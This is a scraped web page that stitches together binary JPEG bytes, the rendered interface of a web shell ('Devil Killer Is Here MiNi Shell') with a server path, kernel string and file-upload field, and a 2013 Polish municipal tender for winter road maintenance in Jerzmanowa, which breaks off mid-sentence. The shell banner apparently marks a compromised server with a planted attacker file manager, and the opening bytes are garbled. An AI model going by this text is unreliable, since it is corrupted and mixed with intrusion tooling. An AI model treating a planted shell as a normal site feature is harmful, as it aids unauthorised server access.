JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131107/453840-N-2013.html

<p class="kh_header"><b>Jerzmanowa: Zimowe utrzymanie dróg gminnych na terenie Gminy Jerzmanowa w sezonie zimowym 2013/2014 z podziałem na 5 części.</b><br>
<b>Numer ogłoszenia: 453840 - 2013; data zamieszczenia: 07.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jerzmanowa , ul. Głogowska 7, 67-222 Jerzmanowa, woj. dolnośląskie, tel. 076 8382046, faks 076 8312119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jerzmanowa.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych na terenie Gminy Jerzmanowa w sezonie zimowym 2013/2014 z podziałem na 5 części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zimowe utrzymanie dróg obejmuje zakres prac mających na celu zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego spowodowanych zjawiskami atmosferycznymi (opady śniegu, opady deszczu ze śniegiem, marznąca mżawka lub śliskość) oraz wywozem nadmiaru śniegu w razie konieczności.
2.Usługi mają charakter wspomagający dla zadania pn. Zimowe utrzymanie dróg gminnych na terenie Gminy Jerzmanowa w sezonie zimowym 2011/2012, 2012/2013, 2013/2014 ogłoszonego przez Gminę Jerzmanowa w roku 2011 w UZP nr 254493-2011.
3.Przedmiotem zamówienia jest świadczenie usług na żądanie Zamawiającego polegających na zimowym utrzymaniu dróg gminnych w okresie zimowym 2013/2014 na terenie Gminy Jerzmanowa z podziałem na 5 części:
3.1 Część 1: 
Usługa płużenia dróg na terenie miejscowości Gaiki, Potoczek, Zofiówka, Bądzów oraz Golowice.
3.2 Część 2:
Usługa płużenia dróg na terenie miejscowości Kurów Mały oraz Jerzmanowa.
3.3 Część 3:
Usługa płużenia dróg na terenie miejscowości Modła, Kurowice, Łagoszów Mały oraz Maniów.
3.4 Część 4:
Usługa płużenia dróg na terenie miejscowości Smardzów oraz Jaczów.
3.5 Część 5:
Usługa wywozu nadmiaru śniegu z terenu Gminy Jerzmanowa.
4. Zamówienie będzie realizowane wg faktycznych potrzeb Zamawiającego. Termin wykonania zamówienia: od dnia podpisania umowy do dnia 15.04.2014r. 
5. Do zapewnienia przejezdności dróg na terenie Gminy Jerzmanowa, Zamawiający przewiduje, że będzie potrzebował w sezonie zimowym 2013/2014 odpowiedni sprzęt. 
6. Wykonawca powinien wykazać się dysponowaniem co najmniej jedną sztuką poniżej wymienionego sprzętu dla każdej z Części przedmiotu zamówienia:
6.1 Dla Części 1 jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem.
6.2 Dla Części 2 jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem. 
6.3 Dla Części 3 jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem. 
6.4 Dla Części 4 jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu  powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem. 
6.5 Dla Części 5; jedną sztuką samochodu samowyładowczego oraz jedną sztuką  sprzętu do załadunku wraz z informacją o podstawie dysponowania tym sprzętem. 
7. Wykonawca zobowiązuje się oznakować pojazdy niezbędne do realizowania przedmiotu zamówienia zgodnie z obowiązującymi przepisami - za co ponosi pełną odpowiedzialność.
8. Cenę ryczałtową brutto za wykonanie 1h pracy sprzętu - usługi dla każdej z części należy podać w złotych    polskich w formularzu ofertowym cyfrowo i słownie (Załącznik Nr 1 do SIWZ). 
9. Usługi związane z zimowym utrzymaniem dróg gminnych rozliczane będą godzinowo za 1h usługi podaną w ofercie cenowej. Za godzinę pracy uważa się 60 minut pracy bez dojazdu.
10. Łączna wartość usług będzie zależna od zakresu faktycznie przepracowanych efektywnie godzin pracy. Stawka 1 h z oferty Wykonawcy pomnożona przez ilość faktycznie przepracowanych godzin potwierdzonych w raporcie przez pracownika Urzędu Gminy.
11. Wykonawca zapewnia sprzęt niezbędny do wykonania przedmiotu umowy a ich eksploatacja i utrzymanie obciąża Wykonawcę.
12. Zamawiający ponosi jedynie koszty rzeczywistej pracy sprzętu związanego z zimowym utrzymaniem dróg (w koszt usługi nie wlicza się kosztu dojazdu na miejsce wykonywania usługi) zgodnie ze stawką 1h zaproponowaną w złożonej przez Wykonawcę ofercie.
13. Wykonawca zostanie poinformowany przez pracownika Urzędu Gminy Jerzmanowa o miejscu i terminie wykonania usługi.
14. Wskazanie lokalizacji odśnieżania i wywozu nadmiaru śniegu dla każdej z części będzie odbywać się na żądanie Zamawiającego sukcesywnie wg jego potrzeb, w okresie obowiązywania umowy.
15. Czas reakcji Wykonawcy od powiadomienia przez pracownika Urzędu Gminy nie powinien być dłuższy niż 1 godzina (60 min) tzn. Wykonawca zapewni gotowość do wykonania usługi w ciągu 1 godziny od zawiadomienia Zamawiającego - dotyczy Części 1 - 4 - usługa płużenia dróg.
16. Usługa wywozu nadmiaru śniegu (dot. Części 5) polegać będzie na załadunku śniegu  na samochód samowyładowczy oraz wywóz śniegu w miejsce zabezpieczone przez Wykonawcę. Wykonawca wskaże miejsce składowania śniegu i ponosi wszelkie koszty z tym związane. Miejsce składowania śniegu które nie może stwarzać zagrożenia dla ludzi i mienia.
17. Zamawiający decyduje o rozpoczęciu usługi (dot. wszystkich części) i wskazuje jej rodzaj i zakres.
18. Wykonanie usługi wywozu nadmiaru śniegu własnym sprzętem przystosowanym do wywozu nadmiaru śniegu (dot. Części 5) odbywać się będzie wyłącznie po zgłoszeniu zapotrzebowania przez Zamawiającego oraz po wytyczeniu miejsca i zakresu usługi.
19. Wykonawca zobowiązany jest do zapewnienia całodobowej łączności telefonicznej z Zamawiającym.
20. Realizacja przedmiotu zamówienia odbywać się będzie w systemie pracy ciągłej (24 godziny na dobę) - dot. Części 1-4.
21. Zamawiający dopuszcza możliwość zmian kolejności wykonywania przedmiotu zamówienia w zależności od warunków atmosferycznych (dot. Części 1-4).
22. Wskazanie lokalizacji płużenia będzie odbywać się sukcesywnie wg potrzeb Zamawiającego, w okresie obowiązywania umowy (dot. Części 1-4).
23. Wykonawca zobowiązany jest do składania meldunków do siedziby Zamawiającego  pracownikowi Urzędu Gminy telefonicznie każdego dnia w godzinach pracy urzędu 7.15 - 15.15 (od poniedziałku do piątku z wyłączeniem świąt oraz dni wolnych od pracy) z podaniem czasookresu pracy za dzień poprzedni. Za okres pracy  w sobotę, niedzielę święta meldunek należy podać następnego dnia roboczego (dot. Części 1-4).
24. Wykonawca ponosi odpowiedzialność materialną za wszelkie szkody spowodowane z jego winy oraz z winy osób, które biorą udział przy wykonywaniu usługi, w szczególności dotyczy to wyrządzonych szkód w infrastrukturze.
25. Wykonawca w trakcie wykonywania usługi ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych usług.
26. Wykonawca zobowiązany jest do wykonania usługi zgodnie z wiedzą techniczną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzenia usług. 
27. Zamawiający zaleca Wykonawcom dokonanie wizji lokalnej na potrzeby złożenia prawidłowej oferty (dot. Części 1-4)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 63.71.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się dysponowaniem sprzętu: 
Dla Części 1: jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem;
Dla Części 2: jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem;
Dla Części 3: jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem; 
Dla Części 4: jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem;
Dla Części 5: jedną sztuką samochodu samowyładowczego oraz jedną sztuką  sprzętu do załadunku wraz z informacją o podstawie dysponowania tym sprzętem.

2. Zamawiający dokonana oceny spełnienia przez Wykonawcę warunków udziału 
w postępowaniu na podstawie załączonych przez Wykonawcę do oferty oświadczenia 
i dokumentu wymienionych w rozdz. VII ust 1 SIWZ, z treści których będą wynikać informacje potwierdzające spełnianie warunków.
3. Ocena będzie dokonywana wg metody spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy w częściach, których dotyczy - Załącznik nr 1 do SIWZ.
2. Pełnomocnictwo podmiotów występujących wspólnie. - jeżeli dotyczy.
3. Pełnomocnictwo dla osoby podpisującej ofertę i oświadczenia - jeśli uprawnienie tej osoby nie wynika z innych dokumentów dołączonych do oferty - jeżeli dotyczy.
4. Zobowiązanie podmiotu (dla każdej części osobno) do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (potencjał techniczny)  - Załącznik nr 6 do SIWZ - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.jerzmanowa.com.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jerzmanowa
ul. Głogowska 7
67-222 Jerzmanowa
pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2013 godzina 08:30, miejsce: Urząd Gminy Jerzmanowa
ul. Głogowska 7
67-222 Jerzmanowa
sekretariat, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa płużenia dróg na terenie miejscowości Gaiki, Potoczek, Zofiówka, Bądzów oraz Golowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zimowe utrzymanie dróg obejmuje zakres prac mających na celu zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego spowodowanych zjawiskami atmosferycznymi (opady śniegu, opady deszczu ze śniegiem, marznąca mżawka lub śliskość). 2. Usługi mają charakter wspomagający dla zadania pn. Zimowe utrzymanie dróg gminnych na terenie Gminy Jerzmanowa w sezonie zimowym 2011/2012, 2012/2013, 2013/2014 - ogłoszonego przez Gminę Jerzmanowa w roku 2011 w UZP nr 254493-2011. 3. Przedmiotem zamówienia jest świadczenie usług na żądanie Zamawiającego polegających na zimowym utrzymaniu dróg gminnych w okresie zimowym 2013/2014 na terenie Gminy Jerzmanowa. Część 1: Usługa płużenia dróg na terenie miejscowości Gaiki, Potoczek, Zofiówka, Bądzów oraz Golowice. 4. Zamówienie będzie realizowane wg faktycznych potrzeb Zamawiającego. Termin wykonania zamówienia: od dnia podpisania umowy do dnia 15.04.2014r. 5. Do zapewnienia przejezdności dróg na terenie Gminy Jerzmanowa, Zamawiający przewiduje, że będzie potrzebował w sezonie zimowym 2013/2014 odpowiedni sprzęt. 6. Wykonawca powinien wykazać się dysponowaniem co najmniej jedną sztuką poniżej wymienionego sprzętu: dla Części 1 jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem. 7. Wykonawca zobowiązuje się oznakować pojazdy niezbędne do realizowania przedmiotu zamówienia zgodnie z obowiązującymi przepisami - za co ponosi pełną odpowiedzialność. 8. Wykonawca zapewnia sprzęt niezbędny do wykonania przedmiotu umowy a ich eksploatacja i utrzymanie obciąża Wykonawcę. 9. Wykonawca zostanie poinformowany przez pracownika Urzędu Gminy Jerzmanowa o miejscu i terminie wykonania usługi. 10. Wskazanie lokalizacji odśnieżania i wywozu nadmiaru śniegu dla każdej z części będzie odbywać się na żądanie Zamawiającego sukcesywnie wg jego potrzeb, w okresie obowiązywania umowy 11. Czas reakcji Wykonawcy od powiadomienia przez pracownika Urzędu Gminy nie powinien być dłuższy niż 1 godzina (60 min) tzn. Wykonawca zapewni gotowość do wykonania usługi w ciągu 1 godziny od zawiadomienia Zamawiającego. 12. Zamawiający decyduje o rozpoczęciu usługi i wskazuje jej rodzaj i zakres. 13. Wykonawca zobowiązany jest do zapewnienia całodobowej łączności telefonicznej z Zamawiającym. 14. Realizacja przedmiotu zamówienia odbywać się będzie w systemie pracy ciągłej (24 godziny na dobę). 15. Zamawiający dopuszcza możliwość zmian kolejności wykonywania przedmiotu zamówienia w zależności od warunków atmosferycznych. 16. Wskazanie lokalizacji płużenia będzie odbywać się sukcesywnie wg potrzeb Zamawiającego, w okresie obowiązywania umowy. 17. Wykonawca zobowiązany jest do składania meldunków do siedziby Zamawiającego pracownikowi Urzędu Gminy telefonicznie każdego dnia w godzinach pracy urzędu 7.15 - 15.15 (od poniedziałku do piątku z wyłączeniem świąt oraz dni wolnych od pracy) z podaniem czasookresu pracy za dzień poprzedni. Za okres pracy w sobotę, niedzielę święta meldunek należy podać następnego dnia roboczego. 18. Wykonawca ponosi odpowiedzialność materialną za wszelkie szkody spowodowane z jego winy oraz z winy osób, które biorą udział przy wykonywaniu usługi, w szczególności dotyczy to wyrządzonych szkód w infrastrukturze. 19. Wykonawca w trakcie wykonywania usługi ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych usług. 20. Wykonawca zobowiązany jest do wykonania usługi zgodnie z wiedzą techniczną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzenia usług. 21. Zamawiający zaleca Wykonawcom dokonanie wizji lokalnej na potrzeby złożenia prawidłowej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa płużenia dróg na terenie miejscowości Kurów Mały oraz Jerzmanowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zimowe utrzymanie dróg obejmuje zakres prac mających na celu zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego spowodowanych zjawiskami atmosferycznymi (opady śniegu, opady deszczu ze śniegiem, marznąca mżawka lub śliskość). 2. Usługi mają charakter wspomagający dla zadania pn. Zimowe utrzymanie dróg gminnych na terenie Gminy Jerzmanowa w sezonie zimowym 2011/2012, 2012/2013, 2013/2014 - ogłoszonego przez Gminę Jerzmanowa w roku 2011 w UZP nr 254493-2011. 3. Przedmiotem zamówienia jest świadczenie usług na żądanie Zamawiającego polegających na zimowym utrzymaniu dróg gminnych w okresie zimowym 2013/2014 na terenie Gminy Jerzmanowa. Część 2: Usługa płużenia dróg na terenie miejscowości Kurów Mały oraz Jerzmanowa. 4. Zamówienie będzie realizowane wg faktycznych potrzeb Zamawiającego. Termin wykonania zamówienia: od dnia podpisania umowy do dnia 15.04.2014r. 5. Do zapewnienia przejezdności dróg na terenie Gminy Jerzmanowa, Zamawiający przewiduje, że będzie potrzebował w sezonie zimowym 2013/2014 odpowiedni sprzęt. 6. Wykonawca powinien wykazać się dysponowaniem co najmniej jedną sztuką poniżej wymienionego sprzętu: dla Części 2 jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem. 7. Wykonawca zobowiązuje się oznakować pojazdy niezbędne do realizowania przedmiotu zamówienia zgodnie z obowiązującymi przepisami - za co ponosi pełną odpowiedzialność. 8. Wykonawca zapewnia sprzęt niezbędny do wykonania przedmiotu umowy a ich eksploatacja i utrzymanie obciąża Wykonawcę. 9. Wykonawca zostanie poinformowany przez pracownika Urzędu Gminy Jerzmanowa o miejscu i terminie wykonania usługi. 10. Wskazanie lokalizacji odśnieżania i wywozu nadmiaru śniegu dla każdej z części będzie odbywać się na żądanie Zamawiającego sukcesywnie wg jego potrzeb, w okresie obowiązywania umowy 11. Czas reakcji Wykonawcy od powiadomienia przez pracownika Urzędu Gminy nie powinien być dłuższy niż 1 godzina 